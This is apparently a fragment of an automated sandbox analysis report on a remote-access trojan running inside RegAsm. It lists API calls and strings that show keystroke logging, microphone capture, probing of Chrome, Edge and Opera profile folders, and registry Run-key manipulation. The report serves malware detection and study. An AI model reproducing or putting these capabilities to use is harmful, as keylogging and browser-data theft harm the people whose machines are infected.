                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: Exception@8Throw$ExceptionRaise
                      • String ID: Unknown exception
                      • API String ID: 3476068407-410509341
                      • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                      • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                      • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                      • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                      APIs
                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: String
                      • String ID: 6/$LCMapStringEx
                      • API String ID: 2568140703-663634990
                      • Opcode ID: 7a47d43865ba002eab841ac63f0264426d0741ac74f7406fba362a09800a18bf
                      • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                      • Opcode Fuzzy Hash: 7a47d43865ba002eab841ac63f0264426d0741ac74f7406fba362a09800a18bf
                      • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                      APIs
                      • waveInPrepareHeader.WINMM(00F71000,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                      • waveInAddBuffer.WINMM(00F71000,00000020,?,00000000,00401A15), ref: 0040185F
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: wave$BufferHeaderPrepare
                      • String ID: XMG
                      • API String ID: 2315374483-813777761
                      • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                      • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                      • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                      • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                      APIs
                      • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: LocaleValid
                      • String ID: IsValidLocaleName$JD
                      • API String ID: 1901932003-2234456777
                      • Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                      • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                      • Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                      • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                      APIs
                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExistsFilePath
                      • String ID: UserProfile$\AppData\Local\Google\Chrome\
                      • API String ID: 1174141254-4188645398
                      • Opcode ID: d11da1c58d5dd2ef9da09c3ea68de0927d50847f2cce6e72d2cc7c3e9ccd8b86
                      • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                      • Opcode Fuzzy Hash: d11da1c58d5dd2ef9da09c3ea68de0927d50847f2cce6e72d2cc7c3e9ccd8b86
                      • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                      APIs
                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExistsFilePath
                      • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                      • API String ID: 1174141254-2800177040
                      • Opcode ID: 62d77e7710f88fd67431bbf20b3e0d601dfd53fd2a54c8c31c6ded84776c1d6f
                      • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                      • Opcode Fuzzy Hash: 62d77e7710f88fd67431bbf20b3e0d601dfd53fd2a54c8c31c6ded84776c1d6f
                      • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                      APIs
                      • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExistsFilePath
                      • String ID: AppData$\Opera Software\Opera Stable\
                      • API String ID: 1174141254-1629609700
                      • Opcode ID: cbec4c721474318851a7c02d4d9936ce5133d15acec931d959add52bdfa17e90
                      • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                      • Opcode Fuzzy Hash: cbec4c721474318851a7c02d4d9936ce5133d15acec931d959add52bdfa17e90
                      • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                      APIs
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 10005F02
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: CountCriticalInitializeSectionSpin
                      • String ID: 6/$InitializeCriticalSectionEx
                      • API String ID: 2593887523-1616871488
                      • Opcode ID: 239e2963de0d6cd0752a7905e87955d260eca2173f5729cc2670a532fb8154a9
                      • Instruction ID: 674605c196627833912876511d98c7499c33f247a669ee446c9f59910835c79f
                      • Opcode Fuzzy Hash: 239e2963de0d6cd0752a7905e87955d260eca2173f5729cc2670a532fb8154a9
                      • Instruction Fuzzy Hash: B0F0B43154011CBBFB159F50CC00DEE7F61DB183D1B108025FD0966164CF32AD10AAA4
                      APIs
                      • GetKeyState.USER32(00000011), ref: 0040B64B
                        • Part of subcall function 0040A3E0: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A416
                        • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                        • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                        • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                        • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?,?,004750F0), ref: 0040A43E
                        • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A461
                        • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                        • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                      • String ID: [AltL]$[AltR]
                      • API String ID: 2738857842-2658077756
                      • Opcode ID: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
                      • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                      • Opcode Fuzzy Hash: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
                      • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                      APIs
                      • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                      • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: uD
                      • API String ID: 0-2547262877
                      • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                      • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                      • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                      • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: Alloc
                      • String ID: 6/$FlsAlloc
                      • API String ID: 2773662609-3971713116
                      • Opcode ID: a4c1784f5932adb522d2ca488d7768f2f935f19ba84bde8ccc2372c69ff9f61f
                      • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                      • Opcode Fuzzy Hash: a4c1784f5932adb522d2ca488d7768f2f935f19ba84bde8ccc2372c69ff9f61f
                      • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: Free
                      • String ID: 6/$FlsFree
                      • API String ID: 3978063606-1835593232
                      • Opcode ID: 266330d642cf3eee4d4242d0d615bdc8a312c100e9c677cf1b977f31c441131a
                      • Instruction ID: b54f93d543b27d774a413c601eeb0e62583d490719bbc6bc30dd5d2f1f1d8414
                      • Opcode Fuzzy Hash: 266330d642cf3eee4d4242d0d615bdc8a312c100e9c677cf1b977f31c441131a
                      • Instruction Fuzzy Hash: B8E0E571A00128ABF321EB648C15EEFBBA0CB09BC1B00416AFE0667209CE325D0096E6
                      APIs
                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExecuteShell
                      • String ID: !D@$open
                      • API String ID: 587946157-1586967515
                      • Opcode ID: 204c713d203efeff6b41638de090f7ddfc4dbb766d4a3fc6f87e83cad3270c1f
                      • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                      • Opcode Fuzzy Hash: 204c713d203efeff6b41638de090f7ddfc4dbb766d4a3fc6f87e83cad3270c1f
                      • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                      APIs
                      • GetKeyState.USER32(00000012), ref: 0040B6A5
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: State
                      • String ID: [CtrlL]$[CtrlR]
                      • API String ID: 1649606143-2446555240
                      • Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                      • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                      • Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                      • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                      APIs
                        • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                      • __Init_thread_footer.LIBCMT ref: 00410F29
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Init_thread_footer__onexit
                      • String ID: ,kG$0kG
                      • API String ID: 1881088180-2015055088
                      • Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                      • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                      • Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                      • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                      APIs
                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D144,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A31
                      • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A45
                      Strings
                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: DeleteOpenValue
                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                      • API String ID: 2654517830-1051519024
                      • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                      • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                      • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                      • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                      APIs
                      • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                      • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: DeleteDirectoryFileRemove
                      • String ID: pth_unenc
                      • API String ID: 3325800564-4028850238
                      • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                      • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                      • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                      • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                      APIs
                      • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                      • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ObjectProcessSingleTerminateWait
                      • String ID: pth_unenc
                      • API String ID: 1872346434-4028850238
                      • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                      • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                      • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                      • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                      • GetLastError.KERNEL32 ref: 00440D35
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharMultiWide$ErrorLast
                      • String ID:
                      • API String ID: 1717984340-0
                      • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                      • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                      • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                      • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                      APIs
                      • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                      • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                      • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                      • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLastRead
                      • String ID:
                      • API String ID: 4100373531-0
                      • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                      • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                      • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                      • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99

                      Execution Graph

                      Execution Coverage:6.2%
                      Dynamic/Decrypted Code Coverage:9.2%
                      Signature Coverage:0%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:81
                      execution_graph 40234 441819 40237 430737 40234->40237 40236 441825 40238 430756 40237->40238 40250 43076d 40237->40250 40239 430774 40238->40239 40240 43075f 40238->40240 40242 43034a memcpy 40239->40242 40258 4169a7 11 API calls 40240->40258 40245 43077e 40242->40245 40243 4307ce 40244 430819 memset 40243->40244 40251 415b2c 40243->40251 40244->40250 40245->40243 40248 4307fa 40245->40248 40245->40250 40247 4307e9 40247->40244 40247->40250 40259 4169a7 11 API calls 40248->40259 40250->40236 40252 415b46 40251->40252 40253 415b42 40251->40253 40252->40247 40253->40252 40254 415b94 40253->40254 40255 415b5a 40253->40255 40256 4438b5 10 API calls 40254->40256 40255->40252 40257 415b79 memcpy 40255->40257 40256->40252 40257->40252 40258->40250 40259->40250 37552 442ec6 19 API calls 37729 4152c6 malloc 37730 4152e2 37729->37730 37731 4152ef 37729->37731 37733 416760 11 API calls 37731->37733 37733->37730 37765 4466f4 37784 446904 37765->37784 37767 446700 GetModuleHandleA 37770 446710 __set_app_type __p__fmode __p__commode 37767->37770 37769 4467a4 37771 4467ac __setusermatherr 37769->37771 37772 4467b8 37769->37772 37770->37769 37771->37772 37785 4468f0 _controlfp 37772->37785 37774 4467bd _initterm __wgetmainargs _initterm 37775 44681e GetStartupInfoW 37774->37775 37783 446810 37774->37783 37777 446866 GetModuleHandleA 37775->37777 37786 41276d 37777->37786 37781 446896 exit 37782 44689d _cexit 37781->37782 37782->37783 37784->37767 37785->37774 37787 41277d 37786->37787 37829 4044a4 LoadLibraryW 37787->37829 37789 412785 37790 412789 37789->37790 37837 414b81 37789->37837 37790->37781 37790->37782 37793 4127c8 37843 412465 memset ??2@YAPAXI 37793->37843 37795 4127ea 37855 40ac21 37795->37855 37800 412813 37873 40dd07 memset 37800->37873 37801 412827 37878 40db69 memset 37801->37878 37805 412822 37899 4125b6 ??3@YAXPAX 37805->37899 37806 40ada2 _wcsicmp 37807 41283d 37806->37807 37807->37805 37810 412863 CoInitialize 37807->37810 37883 41268e 37807->37883 37903 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37810->37903 37814 41296f 37905 40b633 37814->37905 37816 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37821 412957 37816->37821 37826 4128ca 37816->37826 37821->37805 37822 4128d0 TranslateAcceleratorW 37823 412941 GetMessageW 37822->37823 37822->37826 37823->37821 37823->37822 37824 412909 IsDialogMessageW 37824->37823 37824->37826 37825 4128fd IsDialogMessageW 37825->37823 37825->37824 37826->37822 37826->37824 37826->37825 37827 41292b TranslateMessage DispatchMessageW 37826->37827 37828 41291f IsDialogMessageW 37826->37828 37827->37823 37828->37823 37828->37827 37830 4044cf GetProcAddress 37829->37830 37834 4044f7 37829->37834 37831 4044e8 FreeLibrary 37830->37831 37833 4044df 37830->37833 37832 4044f3 37831->37832 37831->37834 37832->37834 37833->37831 37835 404507 MessageBoxW 37834->37835 37836 40451e 37834->37836 37835->37789 37836->37789 37838 414b8a 37837->37838 37839 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37837->37839 37909 40a804 memset 37838->37909 37839->37793 37842 414b9e GetProcAddress 37842->37839 37844 4124e0 37843->37844 37845 412505 ??2@YAPAXI 37844->37845 37846 41251c 37845->37846 37848 412521 37845->37848 37931 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37846->37931 37920 444722 37848->37920 37854 41259b wcscpy 37854->37795 37936 40b1ab ??3@YAXPAX ??3@YAXPAX 37855->37936 37859 40ad4b 37868 40ad76 37859->37868 37960 40a9ce 37859->37960 37860 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37864 40ac5c 37860->37864 37862 40ace7 ??3@YAXPAX 37862->37864 37864->37859 37864->37860 37864->37862 37864->37868 37940 40a8d0 37864->37940 37952 4099f4 37864->37952 37867 40a8d0 7 API calls 37867->37868 37937 40aa04 37868->37937 37869 40ada2 37870 40adc9 37869->37870 37871 40adaa 37869->37871 37870->37800 37870->37801 37871->37870 37872 40adb3 _wcsicmp 37871->37872 37872->37870 37872->37871 37965 40dce0 37873->37965 37875 40dd3a GetModuleHandleW 37970 40dba7 37875->37970 37879 40dce0 3 API calls 37878->37879 37880 40db99 37879->37880 38042 40dae1 37880->38042 38056 402f3a 37883->38056 37885 412766 37885->37805 37885->37810 37886 4126d3 _wcsicmp 37887 4126a8 37886->37887 37887->37885 37887->37886 37889 41270a 37887->37889 38090 4125f8 7 API calls 37887->38090 37889->37885 38059 411ac5 37889->38059 37900 4125da 